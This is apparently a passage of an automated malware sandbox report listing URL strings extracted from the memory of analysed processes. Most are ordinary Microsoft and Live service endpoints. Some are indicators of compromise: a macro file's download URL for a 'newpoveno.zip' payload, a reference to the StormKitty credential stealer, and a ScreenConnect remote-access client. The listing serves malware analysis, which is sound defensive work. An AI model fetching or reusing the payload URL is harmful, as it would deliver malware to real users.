                             Source: powershell.exe, 0000000A.00000002.1377280322.00000238E5D3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
                             Source: svchost.exe, 00000003.00000002.3037640058.00000216C4211000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://wwww3.org/
                             Source: svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live
                             Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                             Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                             Source: svchost.exe, 00000003.00000002.3036859939.00000216C322B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                             Source: svchost.exe, 00000003.00000002.3036859939.00000216C322B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                             Source: svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                             Source: svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                             Source: svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135562377.00000216C3B2A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                             Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                             Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                             Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3035735932.00000216C3B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034177266.00000216C3B4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                             Source: svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                             Source: svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                             Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135562377.00000216C3B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128451284.00000216C3B57000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/msangcwam
                            Source: newpoveno.exe, 00000008.00000002.1262754832.00007FFA212A1000.00000004.00000001.01000000.00000008.sdmp, newpoveno.exe, 00000008.00000002.1262523591.00007FFA2102F000.00000002.00000001.01000000.00000008.sdmp, newpoveno.exe, 00000016.00000002.1379402287.00007FFA16D21000.00000004.00000001.01000000.0000000E.sdmp, newpoveno.exe, 00000016.00000002.1379147805.00007FFA16AAF000.00000002.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458492651.00007FFA2102F000.00000002.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458689272.00007FFA212A1000.00000004.00000001.01000000.0000000E.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
                            Source: newpoveno.exe, 00000008.00000002.1262754832.00007FFA212A1000.00000004.00000001.01000000.00000008.sdmp, newpoveno.exe, 00000008.00000002.1261953094.00007FFA20C11000.00000008.00000001.01000000.00000009.sdmp, newpoveno.exe, 00000008.00000002.1262523591.00007FFA2102F000.00000002.00000001.01000000.00000008.sdmp, newpoveno.exe, 00000016.00000002.1379402287.00007FFA16D21000.00000004.00000001.01000000.0000000E.sdmp, newpoveno.exe, 00000016.00000002.1378746242.00007FFA16691000.00000008.00000001.01000000.0000000F.sdmp, newpoveno.exe, 00000016.00000002.1379147805.00007FFA16AAF000.00000002.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458492651.00007FFA2102F000.00000002.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458098370.00007FFA202F1000.00000008.00000001.01000000.0000000F.sdmp, newpoveno.exe, 0000001B.00000002.1458689272.00007FFA212A1000.00000004.00000001.01000000.0000000E.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
                            Source: newpoveno.exe, 0000001B.00000002.1458689272.00007FFA212A1000.00000004.00000001.01000000.0000000E.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
                            Source: newpoveno.exe, 0000001B.00000002.1458492651.00007FFA2102F000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
                            Source: newpoveno.exe, 00000008.00000002.1262523591.00007FFA2102F000.00000002.00000001.01000000.00000008.sdmp, newpoveno.exe, 00000016.00000002.1379147805.00007FFA16AAF000.00000002.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458492651.00007FFA2102F000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
                            Source: powershell.exe, 0000000A.00000002.1341746632.00000238CD6E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                            Source: powershell.exe, 0000000A.00000002.1358130401.00000238DD750000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 0000000A.00000002.1358130401.00000238DD750000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 0000000A.00000002.1358130401.00000238DD750000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: svchost.exe, 0000000D.00000002.1401762798.00000149EBA59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
                            Source: svchost.exe, 0000000D.00000003.1399894906.00000149EBA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1401590212.00000149EBA42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1396778875.00000149EBA64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1399832739.00000149EBA5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1402037177.00000149EBA65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1402415873.00000149EBA81000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                            Source: svchost.exe, 0000000D.00000002.1402415873.00000149EBA81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                            Source: svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                            Source: svchost.exe, 0000000D.00000003.1396778875.00000149EBA64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1402037177.00000149EBA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                            Source: svchost.exe, 0000000D.00000002.1402415873.00000149EBA81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                            Source: svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                            Source: svchost.exe, 0000000D.00000002.1401490988.00000149EBA3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1396778875.00000149EBA64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1399832739.00000149EBA5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1402037177.00000149EBA65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                            Source: svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                            Source: svchost.exe, 0000000D.00000003.1396778875.00000149EBA64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1402037177.00000149EBA65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1401427871.00000149EBA2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                            Source: svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                            Source: svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                            Source: svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                            Source: svchost.exe, 0000000D.00000002.1401490988.00000149EBA3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1396778875.00000149EBA64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1402037177.00000149EBA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                            Source: svchost.exe, 0000000D.00000003.1399894906.00000149EBA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1401590212.00000149EBA42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                            Source: svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                            Source: svchost.exe, 0000000D.00000003.1398961782.00000149EBA60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1401892264.00000149EBA61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                            Source: ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                            Source: svchost.exe, 0000000D.00000003.1399872660.00000149EBA49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                            Source: svchost.exe, 0000000D.00000002.1401590212.00000149EBA42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                            Source: svchost.exe, 0000000D.00000003.1398961782.00000149EBA60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1401892264.00000149EBA61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                            Source: svchost.exe, 0000000D.00000003.1399894906.00000149EBA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1399739790.00000149EBA5D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1401590212.00000149EBA42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
                            Source: svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                            Source: svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                            Source: svchost.exe, 0000000D.00000003.1396778875.00000149EBA64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1402037177.00000149EBA65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1401427871.00000149EBA2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                            Source: vbaProject.binString found in binary or memory: https://f005.backblazeb2.co(m/f
                            Source: vbaProject.binString found in binary or memory: https://f005.backblazeb2.com/file/newuploavir/newpoveno.zip
                            Source: ScreenConnect.WindowsClient.exe, 0000002E.00000002.6366331058.000000001BAB2000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                            Source: svchost.exe, 00000004.00000003.1203610847.000001D22A633000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
                            Source: svchost.exe, 00000004.00000003.1203610847.000001D22A600000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
                            Source: AddInProcess32.exe, 0000000C.00000002.6331801761.000000000357D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty
                            Source: AddInProcess32.exe, 0000000C.00000002.6331801761.0000000003093000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty0&Or
                            Source: powershell.exe, 0000000A.00000002.1341746632.00000238CD908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: newpoveno.exe, 00000008.00000002.1262523591.00007FFA2102F000.00000002.00000001.01000000.00000008.sdmp, newpoveno.exe, 00000016.00000002.1379147805.00007FFA16AAF000.00000002.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458492651.00007FFA2102F000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/dotnet/reactive
                            Source: newpoveno.exe, 00000008.00000002.1262523591.00007FFA2102F000.00000002.00000001.01000000.00000008.sdmp, newpoveno.exe, 00000016.00000002.1379147805.00007FFA16AAF000.00000002.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458492651.00007FFA2102F000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/graphql-dotnet/graphql-client
                            Source: svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                            Source: svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srfe.com
                            Source: svchost.exe, 00000003.00000002.3036859939.00000216C322B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                            Source: svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                            Source: svchost.exe, 00000003.00000003.1134749358.00000216C3B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                            Source: svchost.exe, 00000003.00000003.1134749358.00000216C3B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                            Source: svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600er
                            Source: svchost.exe, 00000003.00000003.1134749358.00000216C3B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                            Source: svchost.exe, 00000003.00000002.3036859939.00000216C322B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&p;
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                            Source: svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf53457
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                            Source: svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034806357.00000216C3B19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                            Source: svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
                            Source: svchost.exe, 00000003.00000003.1134749358.00000216C3B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                            Source: svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srfer
                            Source: svchost.exe, 00000003.00000003.1134749358.00000216C3B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                            Source: svchost.exe, 00000003.00000003.1134749358.00000216C3B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                            Source: svchost.exe, 00000003.00000003.1134749358.00000216C3B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                            Source: svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                            Source: svchost.exe, 00000003.00000003.1134749358.00000216C3B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                            Source: svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/Inl
                            Source: svchost.exe, 00000003.00000003.1134749358.00000216C3B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135562377.00000216C3B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                            Source: svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600g:OOBEignInAuthUp
